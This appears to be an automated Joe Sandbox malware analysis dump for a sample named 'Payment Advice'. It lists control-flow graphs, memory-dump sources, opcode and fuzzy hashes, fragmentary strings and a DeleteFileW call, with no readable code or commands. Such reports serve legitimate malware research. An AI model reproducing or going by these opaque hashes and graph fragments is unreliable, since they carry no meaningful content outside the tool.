                                                                                      control_flow_graph 2513 68e55c0-68e55dd 2514 68e55df-68e55e2 2513->2514 2515 68e55e4-68e55ea 2514->2515 2516 68e55f1-68e55f4 2514->2516 2517 68e55ec 2515->2517 2518 68e55f6-68e55f9 2515->2518 2516->2518 2519 68e55fe-68e5601 2516->2519 2517->2516 2518->2519 2520 68e560b-68e560e 2519->2520 2521 68e5603-68e5606 2519->2521 2522 68e5628-68e562b 2520->2522 2523 68e5610-68e561a 2520->2523 2521->2520 2524 68e563c-68e563f 2522->2524 2525 68e562d-68e5631 2522->2525 2526 68e5621-68e5623 2523->2526 2529 68e5655-68e5658 2524->2529 2530 68e5641-68e5650 2524->2530 2527 68e578d-68e579a 2525->2527 2528 68e5637 2525->2528 2526->2522 2528->2524 2531 68e565a-68e565b 2529->2531 2532 68e5660-68e5663 2529->2532 2530->2529 2531->2532 2534 68e5665-68e567b 2532->2534 2535 68e5680-68e5683 2532->2535 2534->2535 2536 68e5694-68e569a 2535->2536 2537 68e5685-68e5688 2535->2537 2536->2523 2541 68e56a0 2536->2541 2539 68e568f-68e5692 2537->2539 2540 68e568a-68e568c 2537->2540 2539->2536 2542 68e56a5-68e56a8 2539->2542 2540->2539 2541->2542 2543 68e56ae-68e56b1 2542->2543 2544 68e5742-68e5748 2542->2544 2545 68e56e9-68e56ec 2543->2545 2546 68e56b3-68e56b9 2543->2546 2544->2546 2547 68e574e 2544->2547 2551 68e56ee-68e56f7 2545->2551 2552 68e56f8-68e56fb 2545->2552 2548 68e56bf-68e56c7 2546->2548 2549 68e579b-68e57cb 2546->2549 2550 68e5753-68e5756 2547->2550 2548->2549 2553 68e56cd-68e56da 2548->2553 2571 68e57d5-68e57d8 2549->2571 2554 68e5758-68e575f 2550->2554 2555 68e5764-68e5767 2550->2555 2556 68e56fd-68e571c 2552->2556 2557 68e5721-68e5724 2552->2557 2553->2549 2561 68e56e0-68e56e4 2553->2561 2554->2555 2562 68e577b-68e577d 2555->2562 2563 68e5769-68e5776 2555->2563 2556->2557 2558 68e573d-68e5740 2557->2558 2559 68e5726-68e5738 2557->2559 2558->2544 2558->2550 2559->2558 2561->2545 2565 68e577f 2562->2565 2566 68e5784-68e5787 2562->2566 2563->2562 2565->2566 2566->2514 2566->2527 2572 68e57ec-68e57ef 2571->2572 2573 68e57da-68e57e1 2571->2573 2574 68e5811-68e5814 2572->2574 2575 68e57f1-68e57f5 2572->2575 2576 68e57e7 2573->2576 2577 68e58c2-68e58c9 2573->2577 2580 68e5836-68e5839 2574->2580 2581 68e5816-68e581a 2574->2581 2578 68e58ca-68e58de 2575->2578 2579 68e57fb-68e5803 2575->2579 2576->2572 2594 68e58e5-68e5904 2578->2594 2595 68e58e0-68e58e4 2578->2595 2579->2578 2582 68e5809-68e580c 2579->2582 2584 68e583b-68e583f 2580->2584 2585 68e5857-68e585a 2580->2585 2581->2578 2583 68e5820-68e5828 2581->2583 2582->2574 2583->2578 2586 68e582e-68e5831 2583->2586 2584->2578 2587 68e5845-68e584d 2584->2587 2589 68e585c-68e5866 2585->2589 2590 68e586b-68e586e 2585->2590 2586->2580 2587->2578 2593 68e584f-68e5852 2587->2593 2589->2590 2591 68e5888-68e588b 2590->2591 2592 68e5870-68e5874 2590->2592 2597 68e588d-68e5894 2591->2597 2598 68e5895-68e5898 2591->2598 2592->2578 2596 68e5876-68e587e 2592->2596 2593->2585 2599 68e5906-68e5909 2594->2599 2595->2594 2596->2578 2601 68e5880-68e5883 2596->2601 2602 68e589a-68e58ab 2598->2602 2603 68e58b0-68e58b2 2598->2603 2604 68e590b-68e591e 2599->2604 2605 68e5921-68e5924 2599->2605 2601->2591 2602->2603 2608 68e58b9-68e58bc 2603->2608 2609 68e58b4 2603->2609 2606 68e5926-68e5937 2605->2606 2607 68e5942-68e5945 2605->2607 2617 68e59bd-68e59c4 2606->2617 2618 68e593d 2606->2618 2612 68e595f-68e5962 2607->2612 2613 68e5947-68e5958 2607->2613 2608->2571 2608->2577 2609->2608 2615 68e59ef-68e5b83 2612->2615 2616 68e5968-68e596b 2612->2616 2613->2604 2624 68e595a 2613->2624 2665 68e5cb9-68e5ccc 2615->2665 2666 68e5b89-68e5b90 2615->2666 2620 68e596d-68e597e 2616->2620 2621 68e5985-68e5988 2616->2621 2625 68e59c9-68e59cc 2617->2625 2618->2607 2620->2617 2631 68e5980 2620->2631 2621->2615 2622 68e598a-68e598d 2621->2622 2627 68e598f-68e5996 2622->2627 2628 68e599b-68e599e 2622->2628 2624->2612 2629 68e59ce-68e59df 2625->2629 2630 68e59e6-68e59e9 2625->2630 2627->2628 2633 68e59b8-68e59bb 2628->2633 2634 68e59a0-68e59b1 2628->2634 2629->2620 2639 68e59e1 2629->2639 2630->2615 2632 68e5ccf-68e5cd2 2630->2632 2631->2621 2636 68e5cdc-68e5cde 2632->2636 2637 68e5cd4-68e5cd9 2632->2637 2633->2617 2633->2625 2634->2617 2645 68e59b3 2634->2645 2640 68e5ce5-68e5ce8 2636->2640 2641 68e5ce0 2636->2641 2637->2636 2639->2630 2640->2599 2644 68e5cee-68e5cf7 2640->2644 2641->2640 2645->2633 2667 68e5b96-68e5bb9 2666->2667 2668 68e5c44-68e5c4b 2666->2668 2677 68e5bc1-68e5bc9 2667->2677 2668->2665 2669 68e5c4d-68e5c80 2668->2669 2681 68e5c85-68e5cb2 2669->2681 2682 68e5c82 2669->2682 2679 68e5bce-68e5c0f 2677->2679 2680 68e5bcb 2677->2680 2690 68e5c27-68e5c38 2679->2690 2691 68e5c11-68e5c22 2679->2691 2680->2679 2681->2644 2682->2681 2690->2644 2691->2644
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      • Opcode ID: d547e401380591e6c6272496d00757e87bad59fd3deac1c575e909d43aa1f946
                                                                                      • Instruction ID: dc5033dab66486a9e4922c6a572055a4915f0d8b507c2d949f10b62f2e24a500
                                                                                      • Opcode Fuzzy Hash: d547e401380591e6c6272496d00757e87bad59fd3deac1c575e909d43aa1f946
                                                                                      • Instruction Fuzzy Hash: C722E235F002158FDF64DFA4C4906AEBBB2EF86318F20846AD549EB350DA32DD45CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E6608 Relevance: .8, Instructions: 822COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52ae797ec35e4df1f837a8daaa01f90ead5ad3262e2414ca36c8e083be27a2cb
                                                                                      • Instruction ID: a0c9d8d310af73c1800d41fbd215959719598eaece6faf2524cf12785ea9043c
                                                                                      • Opcode Fuzzy Hash: 52ae797ec35e4df1f837a8daaa01f90ead5ad3262e2414ca36c8e083be27a2cb
                                                                                      • Instruction Fuzzy Hash: D162AF34F002048FDB54DB68D554AADB7F2EF8A314F148469E909EB395EB35EC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EC1B0 Relevance: .6, Instructions: 643COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66121ace82c259bfb5319e565c3be8d6cd745c45e744fd3aba79724794c0af25
                                                                                      • Instruction ID: 62c39bf8a18bd176bc7293f92780279229ed047f5451ce8a1216c5ae4db47622
                                                                                      • Opcode Fuzzy Hash: 66121ace82c259bfb5319e565c3be8d6cd745c45e744fd3aba79724794c0af25
                                                                                      • Instruction Fuzzy Hash: 7D329C34E102099FDB54EF68D890BAEB7B2FB8A314F108529E515EB355DB34EC46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EACE8 Relevance: 12.9, Strings: 10, Instructions: 393COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 68eace8-68ead06 1 68ead08-68ead0b 0->1 2 68ead0d-68ead16 1->2 3 68ead1b-68ead1e 1->3 2->3 4 68ead20-68ead3c 3->4 5 68ead41-68ead44 3->5 4->5 6 68ead46-68ead4a 5->6 7 68ead55-68ead58 5->7 9 68eaf14-68eaf1e 6->9 10 68ead50 6->10 11 68ead5a-68ead6d 7->11 12 68ead72-68ead75 7->12 10->7 11->12 13 68ead8f-68ead92 12->13 14 68ead77-68ead80 12->14 15 68ead9c-68ead9f 13->15 16 68ead94-68ead99 13->16 19 68eaf1f-68eaf36 14->19 20 68ead86-68ead8a 14->20 21 68eaf05-68eaf0e 15->21 22 68eada5-68eada8 15->22 16->15 28 68eaf3d-68eaf56 19->28 29 68eaf38-68eaf3c 19->29 20->13 21->9 21->14 23 68eadbc-68eadbe 22->23 24 68eadaa-68eadb7 22->24 26 68eadc5-68eadc8 23->26 27 68eadc0 23->27 24->23 26->1 31 68eadce-68eadf2 26->31 27->26 32 68eaf58-68eaf5b 28->32 29->28 51 68eadf8-68eae07 31->51 52 68eaf02 31->52 33 68eb1c4-68eb1c7 32->33 34 68eaf61-68eaf9c 32->34 35 68eb1c9 33->35 36 68eb1d6-68eb1d9 33->36 41 68eb18f-68eb1a2 34->41 42 68eafa2-68eafae 34->42 126 68eb1c9 call 68eb240 35->126 127 68eb1c9 call 68eb250 35->127 38 68eb1ea-68eb1ed 36->38 39 68eb1db-68eb1df 36->39 45 68eb1ef-68eb20b 38->45 46 68eb210-68eb213 38->46 39->34 44 68eb1e5 39->44 48 68eb1a4 41->48 60 68eafce-68eb012 42->60 61 68eafb0-68eafc9 42->61 43 68eb1cf-68eb1d1 43->36 44->38 45->46 49 68eb215-68eb21f 46->49 50 68eb220-68eb222 46->50 58 68eb1a5 48->58 53 68eb229-68eb22c 50->53 54 68eb224 50->54 62 68eae1f-68eae5a call 68e65b8 51->62 63 68eae09-68eae0f 51->63 52->21 53->32 59 68eb232-68eb23c 53->59 54->53 58->58 78 68eb02e-68eb06d 60->78 79 68eb014-68eb026 60->79 61->48 80 68eae5c-68eae62 62->80 81 68eae72-68eae89 62->81 65 68eae13-68eae15 63->65 66 68eae11 63->66 65->62 66->62 87 68eb154-68eb169 78->87 88 68eb073-68eb14e call 68e65b8 78->88 79->78 84 68eae66-68eae68 80->84 85 68eae64 80->85 93 68eae8b-68eae91 81->93 94 68eaea1-68eaeb2 81->94 84->81 85->81 87->41 88->87 96 68eae95-68eae97 93->96 97 68eae93 93->97 100 68eaeca-68eaefb 94->100 101 68eaeb4-68eaeba 94->101 96->94 97->94 100->52 103 68eaebe-68eaec0 101->103 104 68eaebc 101->104 103->100 104->100 126->43 127->43
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: dM$dM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-292641143
                                                                                      • Opcode ID: 58c421d7c012f384bdeca365bfbc9cc42109fe5f5f39509bbc959303cbfdce73
                                                                                      • Instruction ID: c9b59de4ae8033651c9256b859b0049a8eecf4fb55fd67674d7b1b386c3a78ed
                                                                                      • Opcode Fuzzy Hash: 58c421d7c012f384bdeca365bfbc9cc42109fe5f5f39509bbc959303cbfdce73
                                                                                      • Instruction Fuzzy Hash: FFE15C34E1020A8FCF69DFA8D5806AEB7B2EF8A714F10852AD505EB354DB75DC46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E9160 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 548 68e9160-68e9185 550 68e9187-68e918a 548->550 551 68e9a48-68e9a4b 550->551 552 68e9190-68e91a5 550->552 553 68e9a4d-68e9a6c 551->553 554 68e9a71-68e9a73 551->554 559 68e91bd-68e91d3 552->559 560 68e91a7-68e91ad 552->560 553->554 556 68e9a7a-68e9a7d 554->556 557 68e9a75 554->557 556->550 561 68e9a83-68e9a8d 556->561 557->556 566 68e91de-68e91e0 559->566 562 68e91af 560->562 563 68e91b1-68e91b3 560->563 562->559 563->559 567 68e91f8-68e9269 566->567 568 68e91e2-68e91e8 566->568 579 68e926b-68e928e 567->579 580 68e9295-68e92b1 567->580 569 68e91ec-68e91ee 568->569 570 68e91ea 568->570 569->567 570->567 579->580 585 68e92dd-68e92f8 580->585 586 68e92b3-68e92d6 580->586 591 68e92fa-68e931c 585->591 592 68e9323-68e933e 585->592 586->585 591->592 597 68e9363-68e9371 592->597 598 68e9340-68e935c 592->598 599 68e9373-68e937c 597->599 600 68e9381-68e93fb 597->600 598->597 599->561 606 68e93fd-68e941b 600->606 607 68e9448-68e945d 600->607 611 68e941d-68e942c 606->611 612 68e9437-68e9446 606->612 607->551 611->612 612->606 612->607
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 1e67609d0dcef6a4ca347d672d412d7c666f386eb7e8a162a4d556d891eb6b80
                                                                                      • Instruction ID: 2d0ee65f2e2b4166a0dce6dbf4615750dd5528172db0d31d82ac96a4aed405d7
                                                                                      • Opcode Fuzzy Hash: 1e67609d0dcef6a4ca347d672d412d7c666f386eb7e8a162a4d556d891eb6b80
                                                                                      • Instruction Fuzzy Hash: A8914B34F1020A9FDF64DF65D850BAEB3F6AF89244F108569C909EB384EB70DD468B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068ECF78 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 615 68ecf78-68ecf93 617 68ecf95-68ecf98 615->617 618 68ecf9a-68ecfb0 617->618 619 68ecfb5-68ecfb8 617->619 618->619 620 68ecfba-68ecffc 619->620 621 68ed001-68ed004 619->621 620->621 623 68ed04d-68ed050 621->623 624 68ed006-68ed048 621->624 626 68ed099-68ed09c 623->626 627 68ed052-68ed094 623->627 624->623 630 68ed09e-68ed0ad 626->630 631 68ed0e5-68ed0e8 626->631 627->626 635 68ed0af-68ed0b4 630->635 636 68ed0bc-68ed0c8 630->636 632 68ed0ea-68ed12c 631->632 633 68ed131-68ed134 631->633 632->633 639 68ed136-68ed152 633->639 640 68ed157-68ed15a 633->640 635->636 641 68ed0ce-68ed0e0 636->641 642 68ed991-68ed9c6 636->642 639->640 645 68ed15c-68ed15e 640->645 646 68ed169-68ed16c 640->646 641->631 662 68ed9c8-68ed9cb 642->662 648 68ed45d 645->648 649 68ed164 645->649 650 68ed172-68ed175 646->650 651 68ed460-68ed46c 646->651 648->651 649->646 659 68ed1be-68ed1c1 650->659 660 68ed177-68ed1b9 650->660 651->630 656 68ed472-68ed75f 651->656 828 68ed986-68ed990 656->828 829 68ed765-68ed76b 656->829 664 68ed20a-68ed20d 659->664 665 68ed1c3-68ed1d2 659->665 660->659 667 68ed9fe-68eda01 662->667 668 68ed9cd-68ed9f9 662->668 677 68ed20f-68ed251 664->677 678 68ed256-68ed259 664->678 672 68ed1d4-68ed1d9 665->672 673 68ed1e1-68ed1ed 665->673 669 68eda24-68eda27 667->669 670 68eda03-68eda1f 667->670 668->667 680 68eda29 669->680 681 68eda36-68eda38 669->681 670->669 672->673 673->642 682 68ed1f3-68ed205 673->682 677->678 683 68ed25b-68ed260 678->683 684 68ed263-68ed266 678->684 875 68eda29 call 68edaf8 680->875 876 68eda29 call 68edae5 680->876 689 68eda3f-68eda42 681->689 690 68eda3a 681->690 682->664 683->684 693 68ed2af-68ed2b2 684->693 694 68ed268-68ed2aa 684->694 689->662 700 68eda44-68eda53 689->700 690->689 696 68ed2fb-68ed2fe 693->696 697 68ed2b4-68ed2f6 693->697 694->693 705 68ed309-68ed30b 696->705 706 68ed300-68ed302 696->706 697->696 698 68eda2f-68eda31 698->681 716 68edaba-68edacf 700->716 717 68eda55-68edab8 call 68e65b8 700->717 711 68ed30d 705->711 712 68ed312-68ed315 705->712 709 68ed31b-68ed324 706->709 710 68ed304 706->710 719 68ed326-68ed32b 709->719 720 68ed333-68ed33f 709->720 710->705 711->712 712->617 712->709 717->716 719->720 725 68ed345-68ed359 720->725 726 68ed450-68ed455 720->726 725->648 740 68ed35f-68ed371 725->740 726->648 746 68ed395-68ed397 740->746 747 68ed373-68ed379 740->747 749 68ed3a1-68ed3ad 746->749 750 68ed37d-68ed389 747->750 751 68ed37b 747->751 760 68ed3af-68ed3b9 749->760 761 68ed3bb 749->761 754 68ed38b-68ed393 750->754 751->754 754->749 762 68ed3c0-68ed3c2 760->762 761->762 762->648 765 68ed3c8-68ed3e4 call 68e65b8 762->765 773 68ed3e6-68ed3eb 765->773 774 68ed3f3-68ed3ff 765->774 773->774 774->726 776 68ed401-68ed44e 774->776 776->648 830 68ed76d-68ed772 829->830 831 68ed77a-68ed783 829->831 830->831 831->642 832 68ed789-68ed79c 831->832 834 68ed976-68ed980 832->834 835 68ed7a2-68ed7a8 832->835 834->828 834->829 836 68ed7aa-68ed7af 835->836 837 68ed7b7-68ed7c0 835->837 836->837 837->642 838 68ed7c6-68ed7e7 837->838 841 68ed7e9-68ed7ee 838->841 842 68ed7f6-68ed7ff 838->842 841->842 842->642 843 68ed805-68ed822 842->843 843->834 846 68ed828-68ed82e 843->846 846->642 847 68ed834-68ed84d 846->847 849 68ed969-68ed970 847->849 850 68ed853-68ed87a 847->850 849->834 849->846 850->642 853 68ed880-68ed88a 850->853 853->642 854 68ed890-68ed8a7 853->854 856 68ed8a9-68ed8b4 854->856 857 68ed8b6-68ed8d1 854->857 856->857 857->849 862 68ed8d7-68ed8f0 call 68e65b8 857->862 866 68ed8ff-68ed908 862->866 867 68ed8f2-68ed8f7 862->867 866->642 868 68ed90e-68ed962 866->868 867->866 868->849 875->698 876->698
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: b071f363af85cfdbabb31c544c025ef4ccc27f61fab68b5e3b8ddd2bac92de4f
                                                                                      • Instruction ID: d520367715ccc2082af787e2e386af2e6834b6fb85b778c4fbec8785204da33f
                                                                                      • Opcode Fuzzy Hash: b071f363af85cfdbabb31c544c025ef4ccc27f61fab68b5e3b8ddd2bac92de4f
                                                                                      • Instruction Fuzzy Hash: DA622E30A002058FCB55EB68D590A5EB7F2FF85304F248A29D419DF369DB75ED8ACB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E4B88 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 877 68e4b88-68e4bac 878 68e4bae-68e4bb1 877->878 879 68e4bd2-68e4bd5 878->879 880 68e4bb3-68e4bcd 878->880 881 68e4bdb-68e4cd3 879->881 882 68e52b4-68e52b6 879->882 880->879 900 68e4cd9-68e4d21 881->900 901 68e4d56-68e4d5d 881->901 884 68e52bd-68e52c0 882->884 885 68e52b8 882->885 884->878 886 68e52c6-68e52d3 884->886 885->884 922 68e4d26 call 68e5433 900->922 923 68e4d26 call 68e5440 900->923 902 68e4d63-68e4dd3 901->902 903 68e4de1-68e4dea 901->903 920 68e4dde 902->920 921 68e4dd5 902->921 903->886 914 68e4d2c-68e4d48 918 68e4d4a 914->918 919 68e4d53 914->919 918->919 919->901 920->903 921->920 922->914 923->914
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: 60f619d27c9d60a45d6daba5f6af0ce44a8a3d038a7b11930b900fd4500c8ee9
                                                                                      • Instruction ID: 5421abbd0ea86355704e679f5d90e8b2cec094153adfda5a33299f0ae70c6748
                                                                                      • Opcode Fuzzy Hash: 60f619d27c9d60a45d6daba5f6af0ce44a8a3d038a7b11930b900fd4500c8ee9
                                                                                      • Instruction Fuzzy Hash: 47617E34F002089FEB549FB5C8557AEBBF6EB89300F20852AE109EB395DF758D458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E9151 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1996 68e9151-68e915e 1997 68e9165-68e9185 1996->1997 1998 68e9160-68e9164 1996->1998 1999 68e9187-68e918a 1997->1999 1998->1997 2000 68e9a48-68e9a4b 1999->2000 2001 68e9190-68e91a5 1999->2001 2002 68e9a4d-68e9a6c 2000->2002 2003 68e9a71-68e9a73 2000->2003 2008 68e91bd-68e91d3 2001->2008 2009 68e91a7-68e91ad 2001->2009 2002->2003 2005 68e9a7a-68e9a7d 2003->2005 2006 68e9a75 2003->2006 2005->1999 2010 68e9a83-68e9a8d 2005->2010 2006->2005 2015 68e91de-68e91e0 2008->2015 2011 68e91af 2009->2011 2012 68e91b1-68e91b3 2009->2012 2011->2008 2012->2008 2016 68e91f8-68e9269 2015->2016 2017 68e91e2-68e91e8 2015->2017 2028 68e926b-68e928e 2016->2028 2029 68e9295-68e92b1 2016->2029 2018 68e91ec-68e91ee 2017->2018 2019 68e91ea 2017->2019 2018->2016 2019->2016 2028->2029 2034 68e92dd-68e92f8 2029->2034 2035 68e92b3-68e92d6 2029->2035 2040 68e92fa-68e931c 2034->2040 2041 68e9323-68e933e 2034->2041 2035->2034 2040->2041 2046 68e9363-68e9371 2041->2046 2047 68e9340-68e935c 2041->2047 2048 68e9373-68e937c 2046->2048 2049 68e9381-68e93fb 2046->2049 2047->2046 2048->2010 2055 68e93fd-68e941b 2049->2055 2056 68e9448-68e945d 2049->2056 2060 68e941d-68e942c 2055->2060 2061 68e9437-68e9446 2055->2061 2056->2000 2060->2061 2061->2055 2061->2056
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 1f449db4ce9254369afffac33e6b07653e3f969d89f306bdf438c3c641025da3
                                                                                      • Instruction ID: daba9aa73fe6412fb088a7bbc289d5f3e895b659f7a123c30c1d124d5029d703
                                                                                      • Opcode Fuzzy Hash: 1f449db4ce9254369afffac33e6b07653e3f969d89f306bdf438c3c641025da3
                                                                                      • Instruction Fuzzy Hash: 46513D35F11205AFDF54DB74D950BAEB3FAABC9644F108469C509EB384EB70DC428B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 060107A0 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2064 60107a0-60107c5 2065 60107cb-60107cd 2064->2065 2066 601091a-601093e 2064->2066 2067 60107d3-60107dc 2065->2067 2068 6010945-6010992 2065->2068 2066->2068 2069 60107ef-6010816 2067->2069 2070 60107de-60107ec 2067->2070 2073 60108a0-60108a4 2069->2073 2074 601081c-601082f call 6010404 2069->2074 2070->2069 2076 60108a6-60108d3 call 6010414 2073->2076 2077 60108db-60108f4 2073->2077 2074->2073 2091 6010831-6010884 2074->2091 2095 60108d8 2076->2095 2085 60108f6 2077->2085 2086 60108fe-60108ff 2077->2086 2085->2086 2086->2066 2091->2073 2096 6010886-6010899 2091->2096 2095->2077 2096->2073
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (bq$(bq
                                                                                      • API String ID: 0-4224401849
                                                                                      • Opcode ID: 4831c1649cc597c2398cde07f0b56571ef14885a384777faa473047c7f8f6288
                                                                                      • Instruction ID: 1a60bd31f808b8d3d62f53a86f981e48bd8e7bcd31615e515117a7bb4cd96215
                                                                                      • Opcode Fuzzy Hash: 4831c1649cc597c2398cde07f0b56571ef14885a384777faa473047c7f8f6288
                                                                                      • Instruction Fuzzy Hash: 4E518F30E047088FCB55EF79C85469EBBF2EF89300F148669D44AAB351EF70A981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E4B79 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2100 68e4b79-68e4bac 2101 68e4bae-68e4bb1 2100->2101 2102 68e4bd2-68e4bd5 2101->2102 2103 68e4bb3-68e4bcd 2101->2103 2104 68e4bdb-68e4cd3 2102->2104 2105 68e52b4-68e52b6 2102->2105 2103->2102 2123 68e4cd9-68e4d21 2104->2123 2124 68e4d56-68e4d5d 2104->2124 2107 68e52bd-68e52c0 2105->2107 2108 68e52b8 2105->2108 2107->2101 2109 68e52c6-68e52d3 2107->2109 2108->2107 2145 68e4d26 call 68e5433 2123->2145 2146 68e4d26 call 68e5440 2123->2146 2125 68e4d63-68e4dd3 2124->2125 2126 68e4de1-68e4dea 2124->2126 2143 68e4dde 2125->2143 2144 68e4dd5 2125->2144 2126->2109 2137 68e4d2c-68e4d48 2141 68e4d4a 2137->2141 2142 68e4d53 2137->2142 2141->2142 2142->2124 2143->2126 2144->2143 2145->2137 2146->2137
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 933ebd73643e1d47700c44df7ebf956ef08d0811f9b37beb9e03846722221199
                                                                                      • Instruction ID: 94e24e62e3e46f89abf6253571fe613829611df461ac910e982fa0b0a67fee06
                                                                                      • Opcode Fuzzy Hash: 933ebd73643e1d47700c44df7ebf956ef08d0811f9b37beb9e03846722221199
                                                                                      • Instruction Fuzzy Hash: 97518E74F002089FEB559FB5C8557AEBBE7EB88700F20852AE109EB395DE758C018B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F88169 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F881E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
